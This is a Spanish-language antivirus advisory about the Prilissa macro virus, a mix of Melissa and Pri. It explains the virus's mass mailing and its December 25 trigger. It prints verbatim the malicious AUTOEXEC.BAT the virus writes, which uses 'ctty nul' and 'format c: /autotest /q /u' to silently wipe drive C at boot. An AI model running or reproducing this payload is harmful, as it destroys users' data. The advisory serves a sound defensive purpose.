Una variante del conocido virus Melissa, con el autoenvío de e-mails infectados a 50 direcciones del Outlook, combinado con el virus Pri, del que toma las rutinas de formateo del disco duro cada 25 de Diciembre, se ha bautizado con el nombre combinado de Prilissa.

Al igual que otros recientes virus de macro, utiliza comandos del DOS para borrar la información, siendo en esta ocasión el FORMAT C: /q el utilizado para borrar FAT y ROOT del disco duro, de una manera

tan rápida como eficaz, perdiendo el acceso a los datos del disco C:

Debe notarse que no añade líneas al final del AUTOEXEC.BAT, sino que lo sobreescribe por otro preprogramado, con lo que no valen argucias como el haber renombrado el AUTOEXEC.BAT por AUTO.BAT (llamando al AUTO.BAT desde el AUTOEXEC, impidiendo que se ejecute cualquier línea añadida al AUTOEXEC), pues este virus ejecutaría el nuevo AUTOEXEC.BAT sobreescrito por él mismo:

@echo off

@echo Vine... Vide... Vice... Moslem Power Never End

@echo Your Computer Have Just Terminated By -=CyberNET Virus=-

ctty nul

format c: /autotest /q /u

Los equipos con NT, al no utilizar AUTOEXEC.BAT se librarán de esta maliciosa acción, así como los que no tengan el FORMAT.COM o lo tengan renombrado a otro nombre, pero los demás con sistemas

Windows 9x, tras la edición de un fichero infectado el 25 de Diciembre ejecutarán el nuevo AUTOEXEC .BAT en el próximo arranque, lo cual ocasionará el borrado total del disco duro antes de iniciar Windows.

ANEXO EXTRA.DAT para control de BubbleBoy, FunLove, Wyx, Mck y este nuevo PRILISSA.

(Para copiar en el directorio del antivirus tras actualizar con 4051)